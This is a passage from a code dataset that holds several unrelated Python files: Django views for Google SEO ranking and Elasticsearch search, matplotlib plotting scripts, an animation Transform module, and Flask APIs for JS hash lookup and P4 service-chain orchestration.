form -> (address): (work, time)\n    save_folder = config['scrape name']\n\n    try:\n        v_set, work_loc = restore_from_save(save_folder)\n    except EmptyFolderError:\n        traceback.print_exc()\n    except FileNotFoundError:\n        traceback.print_exc()\n\n    print(v_set, work_loc)\n\n    run(config, object_dump, v_set, work_loc)\n\n    return 0\n\n\nif __name__ == '__main__':\n    '''test = [\n        '',\n        'C:\\\\Users\\\\setzer\\\\Documents\\\\GitHub\\\\gen_scraper\\\\example',\n        'example_config.yml'\n    ]'''\n    main()\n","sub_path":"gen_scraper/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":15237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"461019779","text":"from django.shortcuts import render\nimport requests\nimport bs4\nimport time\n\ndef seo(request):\n    return render(request, 'seo/index.html')\n\n\ndef seo1(request):\n    search_url_keyword='lalaland'\n    if request.POST.get('keyword'):\n        search_url_keyword=request.POST['keyword']\n    # if request.method=='POST':\n    #     search_url_keyword=request.POST.get('keyword')\n    # else:\n    #     search_url_keyword='lalaland'\n    # Fetch the search rankings\n    if search_url_keyword and search_url_keyword.strip():\n        # Perform the Google search\n        search_url = 'https://www.google.co.jp/search?hl=ja&num=10&q=' + search_url_keyword\n        res_google = requests.get(search_url)\n        res_google.raise_for_status()\n        # Get the URLs of the listed sites with BeautifulSoup\n        bs4_google = bs4.BeautifulSoup(res_google.text, 'html.parser')\n        link_google = bs4_google.select('div > h3.r > a')\n        \n        result = []\n        for i in range(len(link_google)):\n            time.sleep(2)\n            # Strip the odd characters that get inserted into the href\n            site_url = link_google[i].get('href').split('&sa=U&')[0].replace('/url?q=', '')\n            site_title=bs4_google.select('div > h3.r > a')[i].text  # extract contents with .text; .string would also work but returns None here\n            if 'https://' in site_url or 'http://' in site_url:\n                # Analyze the site contents\n                try:\n                    result.append(\"Rank {}: {}, URL: {}\\n\".format(i+1,site_title,site_url))\n                except:\n                    continue\n            # result.append('\\n')\n\n        mapped_num = map(str, result)\n        result_string = ' 
'.join(mapped_num)\n \n return render(request, 'seo/seo.html', {'result':result_string})\n\n","sub_path":"seo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"493287500","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Data_114 = pd.read_csv('rdf_411.dat',header=None,names=['r [Ang]','g(r)'])\n\n# print(Data_114)\n\n'''Convert columns to np.ndarrays'''\n# Radii = Data_114['r [Ang]'].values\n# G_func = Data_114['g(r)'].values\n\ndef Parse_rdf_csv(filename):\n\n # Convert csv file to pandas.dataframe\n Data = pd.read_csv(filename,header=None,names=['r [Ang]','g(r)'])\n # Convert columns in dataframe to numpy.ndarrays\n Radii = Data['r [Ang]'].values\n G = Data['g(r)'].values\n\n return Radii, G\n\n# output = Parse_rdf_csv('rdf_1111.dat')\n# print(output)\n# print(type(output))\n# print(len(output))\n\ndef Plot_rdf_data(Data_Tuple,fig=1,title_types='',Save=False,filename='rdf.dat'):\n\n plt.figure(fig)\n plt.plot(Data_Tuple[0],Data_Tuple[1],c='green')\n plt.xlabel('r [Ang]')\n plt.ylabel('g(r)')\n plt.axis([0,5,0,Data_Tuple[1].max() * 1.2])\n plt.title('rdf ' + title_types)\n\n if Save:\n Save_filename = filename[:-3] + 'png'\n plt.savefig(Save_filename)\n else:\n plt.show()\n\n# Plot_rdf_data(output,title_types='Na - O (Wat)',Save=False,filename='rdf_119.dat')\n\n# Plot_rdf_data(output,title_types='Na - Na',Save=True,filename='rdf_1111.dat')\n\nData_114 = Parse_rdf_csv('rdf_114.dat')\nPlot_rdf_data(Data_114,fig=1,title_types='Na - O (DHPS o)',Save=True,filename='rdf_114.png')\n\nData_115 = Parse_rdf_csv('rdf_115.dat')\nPlot_rdf_data(Data_115,fig=2,title_types='Na - O (DHPS oh)',Save=True,filename='rdf_115.png')\n\nData_117 = Parse_rdf_csv('rdf_117.dat')\nPlot_rdf_data(Data_117,fig=3,title_types='Na - O (WAT)',Save=True,filename='rdf_117.png')\n\nData_119 = Parse_rdf_csv('rdf_119.dat')\nPlot_rdf_data(Data_119,fig=4,title_types='Na - O (OH-)',Save=True,filename='rdf_119.png')\n\nData_1111 = Parse_rdf_csv('rdf_1111.dat')\nPlot_rdf_data(Data_1111,fig=5,title_types='Na - Na',Save=True,filename='rdf_1111.png')\n\nData_full = Parse_rdf_csv('rdf_full.dat')\nPlot_rdf_data(Data_full,fig=6,title_types='Full',Save=True,filename='rdf_full.png')\n","sub_path":"pymatgen/io/lammps/scripts/Visual_Ex.py","file_name":"Visual_Ex.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"525766026","text":"from django.http import HttpResponse\nimport json\nfrom elasticsearch import Elasticsearch\n\n# some helper list\nonlyValue = []\nnormalDict = dict()\nrangeList = []\n\n\ndef searchCertainTag(tag, exclude, category = \"jiff-tagged\", index = \"tagged\", exact = \"false\"):\n es = Elasticsearch([\"http://localhost:9200/\" +category + \"/\" + index])\n \"\"\"Simple Elasticsearch Query\"\"\"\n target = \"\"\n for term in tag:\n target += \"[\"\n target += term\n target += \"] \"\n\n exclude_term = \"\"\n for term in exclude:\n exclude_term += term + \" \"\n if (exact != \"true\"):\n query = json.dumps({\n \"from\": 0, \"size\" : 1000,\n \"query\": {\n \"bool\": {\n \"should\": [\n {\n \"match\": {\n \"Sound Bite Text\": target\n }\n }\n ],\n \"must_not\": [{\n \"match\": {\n \"Sound Bite Text\": exclude_term\n }\n }]\n }\n }\n\n })\n else:\n query = json.dumps({\n \"from\": 0, \"size\": 1000,\n \"query\": {\n \"bool\": {\n \"must\": [\n {\"match\": {\"Sound 
Bite Text\": {\n \"query\": target,\n \"operator\": \"and\"\n }}},\n ],\n \"must_not\": [{\n \"match\": {\"Sound Bite Text\": {\n \"query\": exclude_term,\n \"operator\": \"and\"\n }}\n }]\n }\n },\n })\n return es.search(body=query)\n\n\ndef keyWordsSearchHelper(content = [], exclude = [], category = \"jiff-tagged\", index = \"tagged\", exact = \"false\"):\n es = Elasticsearch([\"http://localhost:9200/\" + category + \"/\" + index])\n tmp = \"\"\n for word in content:\n tmp += word\n tmp += \" \"\n\n exclude_term = \"\"\n for term in exclude:\n exclude_term += term + \" \"\n\n if (exact != \"true\"):\n print(\"false\")\n query = json.dumps({\n \"from\": 0, \"size\" : 1000,\n \"query\": {\n \"bool\": {\n \"should\": [\n {\"match\": {'Sound Bite Text': tmp}},\n ],\n \"must_not\": [{\n \"match\": {\n \"Sound Bite Text\": exclude_term\n }\n }]\n }\n },\n })\n else:\n print(\"true\")\n query = json.dumps({\n \"from\": 0, \"size\": 1000,\n \"query\": {\n \"bool\": {\n \"must\": [\n {\"match\": {\"Sound Bite Text\": {\n \"query\": tmp,\n \"operator\": \"and\"\n }}},\n ],\n \"must_not\": [{\n \"match\": {\"Sound Bite Text\": {\n \"query\": exclude_term,\n \"operator\": \"and\"\n }}\n }]\n }\n },\n })\n return es.search(body=query)\n\n\ndef keywordAndFacetHelper(keyword = [], tag = [],\n exclude = [], category = \"jiff-tagged\", index = \"tagged\", exact = 'false'):\n es = Elasticsearch([\"http://localhost:9200/\" + category + \"/\" + index])\n keywords = \"\"\n for word in keyword:\n keywords += word\n keywords += \" \"\n\n\n tags = \"\"\n for word in tag:\n tags += word\n tags += \" \"\n\n\n exclude_term = \"\"\n for term in exclude:\n exclude_term += term + \" \"\n\n if (exact != \"true\"):\n print(\"false\")\n query = json.dumps({\n \"from\": 0, \"size\": 1000,\n \"query\": {\n \"bool\": {\n \"should\": [\n {\"match\": {'Sound Bite Text': keywords}}\n ],\n \"must\": [\n {\"match\": {'Sound Bite Text': tags}}\n ],\n \"must_not\": [{\n \"match\": {\n \"Sound Bite Text\": exclude_term\n }\n }]\n }\n },\n })\n else:\n print(\"true\")\n query = json.dumps({\n \"from\": 0, \"size\": 1000,\n \"query\": {\n \"bool\": {\n \"must\": [\n {\"match\": {\"Sound Bite Text\": {\n \"query\": keywords,\n \"operator\": \"and\"\n }}},\n {\"match\": {\"Sound Bite Text\": {\n \"query\": tags,\n \"operator\": \"and\"\n }}}\n ],\n \"must_not\": [{\n \"match\": {\"Sound Bite Text\": {\n \"query\": exclude_term,\n \"operator\": \"and\"\n }}\n }]\n }\n },\n })\n return es.search(body=query)\n\ndef searchBoth(request):\n category = request.GET[\"category\"]\n index = request.GET[\"index\"]\n keyword = request.GET[\"keywords\"]\n tags = request.GET[\"tag\"]\n excludes = request.GET[\"exclude\"]\n num = request.GET[\"num\"]\n exact = request.GET[\"exacted\"]\n if (len(num) == 0) :\n num = 100\n else:\n num = int(num)\n tag = tags.split(\",\")\n exclude = excludes.split(\",\")\n keyword = keyword.split(\",\")\n res = keywordAndFacetHelper(keyword, tag, exclude, category, index, exact)\n i = 0\n tmp = \"\"\n for hit in res['hits']['hits']:\n # print(hit)\n tmp += \"score: \" + str(hit['_score']) + \" content: \" + hit['_source']['Sound Bite Text'] + \"`\"\n i += 1\n if (i >= num): break\n print(len(res['hits']['hits']))\n return HttpResponse(tmp)\n\n\n\ndef searchTag(request):\n category = request.GET[\"category\"]\n index = request.GET[\"index\"]\n tags = request.GET[\"tags\"]\n excludes = request.GET[\"exclude\"]\n num = request.GET[\"num\"]\n exact = request.GET[\"exacted\"]\n if (len(num) == 0) :\n num = 100\n else:\n 
num = int(num)\n tag = tags.split(\",\")\n exclude = excludes.split(\",\")\n res = searchCertainTag(tag, exclude, category, index, exact)\n i = 0\n tmp = \"\"\n for hit in res['hits']['hits']:\n # print(hit)\n tmp += \"score: \" + str(hit['_score']) + \" content: \" + hit['_source']['Sound Bite Text'] + \"`\"\n i += 1\n if (i >= num): break\n return HttpResponse(tmp)\n\n\ndef searchKeyword(request):\n category = request.GET[\"category\"]\n index = request.GET[\"index\"]\n keyword = request.GET[\"keywords\"]\n excludes = request.GET[\"exclude\"]\n num = request.GET[\"num\"]\n exact = request.GET[\"exacted\"]\n if (len(num) == 0) :\n num = 100\n else:\n num = int(num)\n keywords = keyword.split(\",\")\n exclude = excludes.split(\",\")\n print(keywords)\n print(excludes)\n res = keyWordsSearchHelper(keywords, exclude, category, index, exact)\n i = 0\n tmp = \"\"\n for hit in res['hits']['hits']:\n # print(hit)\n tmp += \"score: \" + str(hit['_score']) + \" content: \" + hit['_source']['Sound Bite Text'] + \"`\"\n i += 1\n if (i >= num): break\n return HttpResponse(tmp)\n\n\ndef printSearchResult(result):\n i = 0\n for hit in result['hits']['hits']:\n # print(hit)\n print(\n \"score: \" + str(hit['_score']) + \" content: \" + hit['_source']['Sound Bite Text'], end=''\n ) # ['_source']['Sound Bite Text']\n i += 1\n if (i > 100): break\n\n\n\nif __name__ == \"__main__\":\n goal = [\"pain_points\"]\n exclude = [\"good\"]\n result = searchCertainTag(goal, exclude)\n # result = keyWordsSearch(['frappuccino'])\n printSearchResult(result)\n\n\n\n# def DrawingSearch(request):\n# keywords = request.GET[\"request\"]\n# onlyValue = []\n# normalDict = dict()\n# rangeList = []\n# # split by comma\n# keywords = keywords.split(\",\")\n# for i in range(len(keywords)):\n# if(\":\" in keywords[i]):\n# keywords[i] = keywords[i].split(\":\")\n#\n# # multiple keywords\n#\n# for i in range(len(keywords)):\n# #case 1, only have single value\n# if(len(keywords[i]) != 2):\n# print \"the keyword #\" + str(i+1) + \" only has a value \"\\\n# + keywords[i]\n# onlyValue.append(keywords[i])\n#\n#\n#\n# #case 2 not range value\n# elif(len(keywords[i]) == 2 and \"[\" not in keywords[i][1]):\n# print \"the keyword #\" + str(i+1) + \" uses attribute name \"\\\n# + keywords[i][0] + \", and has a value \" + keywords[i][1]\n# normalDict[keywords[i][0]] = keywords[i][1]\n#\n#\n#\n#\n# #case 3 range value\n# elif (len(keywords[i]) == 2 and \"[\" in keywords[i][1]):\n# years = keywords[i][1]\n# years = years.strip(\"[\")\n# years = years.strip(\"]\")\n# years = years.split(\"-\")\n# num1 = years[0]\n# num2 = years[1]\n# print \"the keyword #\" + str(i + 1) + \" uses attribute name \"\\\n# + keywords[i][0] + \", and has a ranged value with lower boundary \"\\\n# + num1 + \" and upper boundary \" + num2\n# # addToRangeList(num1, num2)\n# rangeList.append(int(num1))\n# rangeList.append(int(num2))\n#\n# # case 4 Invalid string\n# else:\n# print \"Invalid string\"\n#\n#\n# # search end, start filtering\n# result = filterQuery(onlyValue, normalDict, rangeList)\n# return result\n#\n#\n#\n#\n# # return all the Query Set\n# def AllQuerySet():\n# drawings = Drawing.objects.all()\n# return drawings\n#\n# # return filtered Query Set\n# def filterQuery(onlyValue, normalDict, rangeList):\n#\n# drawings = Drawing.objects.all()\n# # print drawings\n# # 1. 
ConstructedYear Query\n# if(len(rangeList) != 0):\n# q = drawings.filter(ConstructedYear__gte=rangeList[0])\n# q = q.filter(ConstructedYear__lte=rangeList[1])\n# # unable to find correct building with given construction year\n# if(len(q) == 0):\n# return HttpResponse(\"Failed\")\n# # 2. have attribute name\n# for key in normalDict:\n# if(key == \"DrawingID\"):\n# q = q.filter(DrawingID = normalDict[key])\n# if (key == \"BuildingName\"):\n# q = q.filter(BuildingName=normalDict[key])\n# if (key == \"Contractor\"):\n# q = q.filter(Contractor=normalDict[key])\n# if (key == \"Floor\"):\n# q = q.filter(Floor=normalDict[key])\n# if (key == \"Shop\"):\n# q = q.filter(Shop=normalDict[key])\n#\n# # 3. handle single value\n# for i in range(len(onlyValue)):\n# q = q.filter(Q(DrawingID=onlyValue[i])|Q(BuildingName=onlyValue[i])|\\\n# Q(Contractor=onlyValue[i])|Q(Floor=onlyValue[i])| \\\n# Q(Shop=onlyValue[i]))\n#\n#\n# # 1. No ConstructedYear Query\n# else:\n# q = drawings\n# # 2. have attribute name\n# for key in normalDict:\n# if (key == \"DrawingID\"):\n# q = q.filter(DrawingID=normalDict[key])\n# if (key == \"BuildingName\"):\n# q = q.filter(BuildingName=normalDict[key])\n# if (key == \"Contractor\"):\n# q = q.filter(Contractor=normalDict[key])\n# if (key == \"Floor\"):\n# q = q.filter(Floor=normalDict[key])\n# if (key == \"Shop\"):\n# q = q.filter(Shop=normalDict[key])\n# # 3. handle single value\n# for i in range(len(onlyValue)):\n# q = q.filter(Q(DrawingID=onlyValue[i]) | Q(BuildingName=onlyValue[i]) | \\\n# Q(Contractor=onlyValue[i]) | Q(Floor=onlyValue[i]) | \\\n# Q(Shop=onlyValue[i]))\n#\n#\n# # print q\n# #end of Query Line, prepare JSON String\n# result = \"\"\n# for drawing in q:\n# result = result + drawing.DrawingID + \",\"\n# result = result + drawing.BuildingName + \",\"\n# result = result + str(drawing.ConstructedYear) + \",\"\n# result = result + drawing.Contractor + \",\"\n# result = result + drawing.Floor + \",\"\n# result = result + drawing.Shop + \";\"\n#\n# if(len(result) != 0):\n# result = result[:-1]\n#\n#\n# if(len(result) != 0):\n# return HttpResponse(result)\n# else:\n# return HttpResponse(\"Failed\")\n","sub_path":"jacquard_django/drawingSearchApp/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":12800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"373025857","text":"from app import run_app\nfrom argparse import ArgumentParser\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n\n parser.add_argument('-p', '--port', type=int, help='set the port the web app will run on')\n parser.add_argument('-d', '--debug', action='store_true', help='set the web app to run in debug mode')\n\n args = parser.parse_args()\n\n run_app(args.__dict__)","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"581304191","text":"import numpy as np\nimport itertools as it\nimport inspect\nimport copy\nimport warnings\n\nfrom animation import Animation\nfrom mobject import Mobject, Point\nfrom constants import *\nfrom helpers import *\n\ndef straight_path(start_points, end_points, alpha):\n return (1-alpha)*start_points + alpha*end_points\n\ndef semi_circular_path(start_points, end_points, alpha, axis):\n midpoints = (start_points + end_points) / 2\n angle = alpha * np.pi\n rot_matrix = rotation_matrix(angle, axis)[:2, :2]\n result = np.zeros(start_points.shape)\n result[:,:2] = 
np.dot(\n (start_points - midpoints)[:,:2], \n np.transpose(rot_matrix)\n ) + midpoints[:,:2]\n result[:,2] = (1-alpha)*start_points[:,2] + alpha*end_points[:,2]\n return result\n\ndef clockwise_path(start_points, end_points, alpha):\n return semi_circular_path(start_points, end_points, alpha, IN)\n\ndef counterclockwise_path(start_points, end_points, alpha):\n return semi_circular_path(start_points, end_points, alpha, OUT)\n\nclass Transform(Animation):\n def __init__(self, mobject1, mobject2, \n run_time = DEFAULT_TRANSFORM_RUN_TIME,\n interpolation_function = straight_path,\n black_out_extra_points = False,\n *args, **kwargs):\n self.interpolation_function = interpolation_function\n count1, count2 = mobject1.get_num_points(), mobject2.get_num_points()\n if count2 == 0:\n mobject2 = Point((SPACE_WIDTH, SPACE_HEIGHT, 0))\n count2 = mobject2.get_num_points()\n Mobject.align_data(mobject1, mobject2)\n Animation.__init__(self, mobject1, run_time = run_time, *args, **kwargs)\n self.ending_mobject = mobject2\n self.mobject.SHOULD_BUFF_POINTS = \\\n mobject1.SHOULD_BUFF_POINTS and mobject2.SHOULD_BUFF_POINTS\n self.reference_mobjects.append(mobject2)\n self.name += \"To\" + str(mobject2)\n\n if black_out_extra_points and count2 < count1:\n #Ensure redundant pixels fade to black\n indices = np.arange(\n 0, count1-1, float(count1) / count2\n ).astype('int')\n temp = np.zeros(mobject2.points.shape)\n temp[indices] = mobject2.rgbs[indices]\n mobject2.rgbs = temp\n self.non_redundant_m2_indices = indices\n\n def update_mobject(self, alpha):\n self.mobject.points = self.interpolation_function(\n self.starting_mobject.points,\n self.ending_mobject.points,\n alpha\n )\n self.mobject.rgbs = straight_path(\n self.starting_mobject.rgbs,\n self.ending_mobject.rgbs,\n alpha\n )\n\n def clean_up(self):\n Animation.clean_up(self)\n if hasattr(self, \"non_redundant_m2_indices\"):\n #Reduce mobject (which has become identical to mobject2), as\n #well as mobject2 itself\n for mobject in [self.mobject, self.ending_mobject]:\n for attr in ['points', 'rgbs']:\n setattr(\n mobject, attr, \n getattr(\n self.ending_mobject, \n attr\n )[self.non_redundant_m2_indices]\n )\n\nclass ClockwiseTransform(Transform):\n def __init__(self, mobject1, mobject2, **kwargs):\n Transform.__init__(\n self, mobject1, mobject2, \n interpolation_function = clockwise_path, **kwargs\n )\n\nclass CounterclockwiseTransform(Transform):\n def __init__(self, mobject1, mobject2, **kwargs):\n Transform.__init__(\n self, mobject1, mobject2, \n interpolation_function = counterclockwise_path, **kwargs\n )\n\nclass FadeToColor(Transform):\n def __init__(self, mobject, color, *args, **kwargs):\n target = copy.deepcopy(mobject).highlight(color)\n Transform.__init__(self, mobject, target, *args, **kwargs)\n\nclass Highlight(FadeToColor):\n def __init__(self, mobject, color = \"red\",\n run_time = DEFAULT_ANIMATION_RUN_TIME, \n alpha_func = there_and_back, *args, **kwargs):\n FadeToColor.__init__(\n self, mobject, color, \n run_time = run_time, \n alpha_func = alpha_func, \n *args, **kwargs\n )\n\nclass ScaleInPlace(Transform):\n def __init__(self, mobject, scale_factor, *args, **kwargs):\n target = copy.deepcopy(mobject)\n center = mobject.get_center()\n target.shift(-center).scale(scale_factor).shift(center)\n Transform.__init__(self, mobject, target, *args, **kwargs)\n\nclass ApplyMethod(Transform):\n def __init__(self, method, *args, **kwargs):\n \"\"\"\n Method is a method of Mobject. 
*args is for the method,\n        **kwargs is for the transform itself.\n\n        Relies on the fact that mobject methods return the mobject\n        \"\"\"\n        if not inspect.ismethod(method) or \\\n           not isinstance(method.im_self, Mobject):\n            raise TypeError(\"Not a valid Mobject method\")\n        Transform.__init__(\n            self,\n            method.im_self,\n            copy.deepcopy(method)(*args),\n            **kwargs\n        )\n\nclass ApplyFunction(Transform):\n    def __init__(self, function, mobject, **kwargs):\n        Transform.__init__(\n            self, \n            mobject, \n            function(copy.deepcopy(mobject)),\n            **kwargs\n        )\n        self.name = \"ApplyFunctionTo\"+str(mobject)\n\n\nclass ApplyPointwiseFunction(Transform):\n    def __init__(self, function, mobject, \n                 run_time = DEFAULT_ANIMATION_RUN_TIME, **kwargs):\n        map_image = copy.deepcopy(mobject)\n        map_image.points = np.array(map(function, map_image.points))\n        Transform.__init__(\n            self, mobject, map_image, \n            run_time = run_time, **kwargs\n        )\n        self.name = \"\".join([\n            \"Apply\",\n            \"\".join([s.capitalize() for s in function.__name__.split(\"_\")]),\n            \"To\" + str(mobject)\n        ])\n\nclass ComplexFunction(ApplyPointwiseFunction):\n    def __init__(self, function, *args, **kwargs):\n        def point_map(point):\n            x, y, z = point\n            c = np.complex(x, y)\n            c = function(c)\n            return c.real, c.imag, z\n        if len(args) > 0:\n            args = list(args)\n            mobject = args.pop(0)\n        elif \"mobject\" in kwargs:\n            mobject = kwargs.pop(\"mobject\")\n        else:\n            mobject = Grid()\n        ApplyPointwiseFunction.__init__(self, point_map, mobject, *args, **kwargs)\n        self.name = \"ComplexFunction\" + to_cammel_case(function.__name__)\n        #Todo, abstract away function naming\n\n\nclass TransformAnimations(Transform):\n    def __init__(self, start_anim, end_anim, \n            alpha_func = squish_alpha_func(smooth),\n            **kwargs):\n        if \"run_time\" in kwargs:\n            run_time = kwargs.pop(\"run_time\")\n            for anim in start_anim, end_anim:\n                anim.set_run_time(run_time)\n        self.start_anim, self.end_anim = start_anim, end_anim\n        Transform.__init__(\n            self,\n            start_anim.mobject,\n            end_anim.mobject,\n            run_time = max(start_anim.run_time, end_anim.run_time),\n            alpha_func = alpha_func,\n            **kwargs\n        )\n        #Rewire starting and ending mobjects\n        start_anim.mobject = self.starting_mobject\n        end_anim.mobject = self.ending_mobject\n\n    def update(self, alpha):\n        self.start_anim.update(alpha)\n        self.end_anim.update(alpha)\n        Transform.update(self, alpha)\n\n\n\n\n\n","sub_path":"animation/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":7664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"10324353","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom flask import Flask, request, jsonify\n\nfrom sanejs.query import Query\n\napp = Flask(__name__)\n\nq = Query()\n\n\n@app.route('/', methods=['POST', 'HEAD'])\ndef sha512():\n    if request.method == 'HEAD':\n        # Just returns ack if the webserver is running\n        return 'Ack'\n    try:\n        req_data = request.get_json(force=True)\n    except Exception as e:\n        return jsonify({'error': str(e)})\n\n    if not req_data.get('sha512'):\n        return jsonify({'error': 'The key \"sha512\" is required.'})\n    return jsonify(q.search_hash(req_data['sha512']))\n\n\n@app.route('/library', methods=['POST'])\ndef library():\n    try:\n        req_data = request.get_json(force=True)\n    except Exception as e:\n        return jsonify({'error': str(e)})\n\n    if not req_data.get('library'):\n        return jsonify({'error': 'The key \"library\" is required.'})\n\n    if 'version' in req_data:\n        to_return = q.search_lib(req_data['library'], req_data['version'])\n    else:\n        to_return = 
q.search_lib(req_data['library'])\n\n    return jsonify(to_return)\n","sub_path":"website/web/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"58707985","text":"import matplotlib.pyplot as plt\r\n\r\n# ******************Plot***********************************************\r\ny1 = [10, 13, 5, 40, 30, 60, 70, 12, 55, 25]\r\nx1 = range(0, 10)\r\nx2 = range(0, 9)\r\ny2 = [5, 8, 0, 30, 20, 40, 50, 10, 40]\r\nplt.figure(figsize=(12, 6))\r\nplt.plot(x1, y1, label='First line', linewidth=3, color='r', marker='o',\r\n         markerfacecolor='blue', markersize=6)\r\nplt.plot(x2, y2, label='second line')\r\nplt.xlabel('Plot Number')\r\nplt.ylabel('Important var')\r\nplt.title('Interesting Graph\\nCheck it out')\r\nplt.legend()\r\nfig1 = plt.figure('fig1')\r\nplt.show()\r\n\r\n# *******************BAR************************\r\nfig2 = plt.figure('fig2')\r\ny1 = [10, 13, 5, 40, 30, 60, 70, 12, 55, 25]\r\nx1 = range(0, 20, 2)\r\nx2 = range(1, 21, 2)\r\ny2 = [5, 8, 0, 30, 20, 40, 50, 10, 40, 15]\r\nplt.bar(x1, y1, label='First line')\r\nplt.bar(x2,y2,label='second line',color='r')\r\nplt.xlabel('Plot Number')\r\nplt.ylabel('Important var')\r\nplt.title('Interesting Graph\\nCheck it out')\r\nplt.legend()\r\nplt.show()\r\n\r\n","sub_path":"8 usingMatplotlib/4yituduoxian.py","file_name":"4yituduoxian.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"537867702","text":"# -*- coding:utf-8 -*-\nfrom flask import Flask, request, jsonify\nimport requests\nimport json\nimport time\nimport os\nimport sys\n\n# Import P4Runtime lib from parent utils dir\n# Probably there's a better way of doing this.\nsys.path.append(\n    os.path.join(os.path.dirname(os.path.abspath(__file__)),\n                 '../utils/'))\nimport const\n\n\ndef addr2dec(addr):\n    \"Convert a dotted-decimal IP address string to a decimal integer\"\n    items = [int(x) for x in addr.split(\".\")]\n    return sum([items[i] << [24, 16, 8, 0][i] for i in range(4)])\n\n\ndef dec2addr(dec):\n    \"Convert a decimal integer IP to a dotted-decimal address string\"\n    return \".\".join([str(dec >> x & 0xff) for x in [24, 16, 8, 0]])\n\n\napp = Flask(__name__)\nchain_id = 0\nserver_addr = {\n    \"s1\": \"http://10.149.252.25:8090\",\n    \"s2\": \"http://10.149.252.26:8090\",\n    \"s3\": \"http://10.149.252.27:8090\"\n}\nheaders = {\n    'Content-Type': 'application/json'\n}\nnf_offlodability = {\n    \"Monitor\": const.OFFLOADABLE,\n    \"Firewall\": const.OFFLOADABLE,\n    \"IPRewriter\": const.PARTIAL_OFFLOADABLE\n}\n\n\ndef parse_chain(chain_desc):\n    \"\"\"Parse user input chain\n    assign id to each nf and group nf by location\n    assign offloadability to each nf\n    \"\"\"\n    global nf_offlodability\n    nf_id = 0\n    cur_location = None\n    cur_group = None\n    nf_groups = {}\n    for nf in chain_desc:\n        # assign id first\n        nf['id'] = nf_id\n        nf_id = nf_id + 1\n\n        # assign offloadability\n        nf['offloadability'] = nf_offlodability[nf['name']]\n        # group by location\n        location = nf['location']\n        if location == cur_location:\n            cur_group.append(nf)\n        else:\n            if cur_location is not None:\n                nf_groups[cur_location] = cur_group\n            cur_location = location\n            cur_group = [nf]\n\n    nf_groups[cur_location] = cur_group\n    return nf_groups\n\n\ndef parse_route(chain_route, nf_groups, chain_id, chain_length):\n    route_infos = {}\n    for switch in chain_route:\n        if switch != \"egress\" and switch != \"ingress\":\n            num_nfs = len(nf_groups.get(switch)) if nf_groups.get(\n                switch) != None else 0\n
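            # --- added worked example (editor's note, not in the original) ---\n            # For the sample request at the bottom of this file (three NFs, all on\n            # s1, route ['ingress', 's1', 'egress']) with chain_id 0, this loop\n            # yields:\n            #   route_infos == {'s1': {'chain_id': 0, 'chain_length': 0, 'output_port': 0}}\n            # i.e. chain_length records how many NFs remain ahead of the packet\n            # after the current switch (here 3 - 3 = 0).\n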
            chain_length = chain_length - num_nfs\n            route_infos[switch] = {\n                \"chain_id\": chain_id,\n                \"chain_length\": chain_length,\n                \"output_port\": 0  # hard-coded for now; should really be derived from the topology\n            }\n    return route_infos\n\n\n\n@app.route('/test')\ndef test():\n    return \"Hello from p4sfc ochestrator\\n\"\n\n\n@app.route('/deploy_chain', methods=['POST'])\ndef deploy_chain():\n    receive_time = int(time.time()*1000)\n\n    global chain_id\n    global server_addr\n    global headers\n\n    data = request.get_json()\n    chain_desc = data.get(\"chain_desc\")\n    chain_length = len(chain_desc)\n    nf_groups = parse_chain(chain_desc)\n\n    for location, nfs in nf_groups.iteritems():\n        url = server_addr[location] + \"/deploy_chain\"\n        payload = {\n            \"chain_id\": chain_id,\n            \"chain_length\": chain_length,\n            \"nfs\": nfs\n        }\n        chain_length = chain_length - len(nfs)\n        requests.request(\"POST\", url, headers=headers,\n                         data=json.dumps(payload))\n\n    chain_route = data.get(\"route\")\n    chain_length = len(chain_desc)\n    route_infos = parse_route(chain_route, nf_groups, chain_id, chain_length)\n    complete_time = 0\n    for switch, route_info in route_infos.iteritems():\n        url = server_addr[switch] + \"/insert_route\"\n        payload = {\n            \"chain_id\": route_info[\"chain_id\"],\n            \"chain_length\": route_info[\"chain_length\"],\n            \"output_port\": route_info[\"output_port\"]\n        }\n        response = requests.request(\"POST\", url, headers=headers,\n                                    data=json.dumps(payload))\n        complete_time = max(int(response.text), complete_time)\n\n    response_payload = {\n        \"chain_id\": chain_id,\n        \"receive_time\": receive_time,\n        \"complete_time\": complete_time\n    }\n\n    chain_id = chain_id + 1\n    return jsonify(response_payload)\n\n\n@app.route('/delete_chain', methods=['POST'])\ndef delete_chain():\n    receive_time = int(time.time()*1000)\n    global server_addr\n    global headers\n    data = request.get_json()\n    chain_id = data.get(\"chain_id\")\n    payload = {\n        \"chain_id\": chain_id\n    }\n    complete_time = 0\n    for location, addr in server_addr.iteritems():\n        url = addr + \"/delete_chain\"\n        response = requests.request(\"POST\", url, headers=headers,\n                                    data=json.dumps(payload))\n        complete_time = max(int(response.text), complete_time)\n\n    response_payload = {\n        \"receive_time\": receive_time,\n        \"complete_time\": complete_time\n    }\n\n    return jsonify(response_payload)\n\n\nif __name__ == '__main__':\n    app.run(host=\"0.0.0.0\", port='8091')\n    {\n        \"chain_desc\": [\n            {\n                \"name\": \"Monitor\",\n                \"click_config\": {\n                    \"param1\": \"abc\"\n                },\n                \"location\": 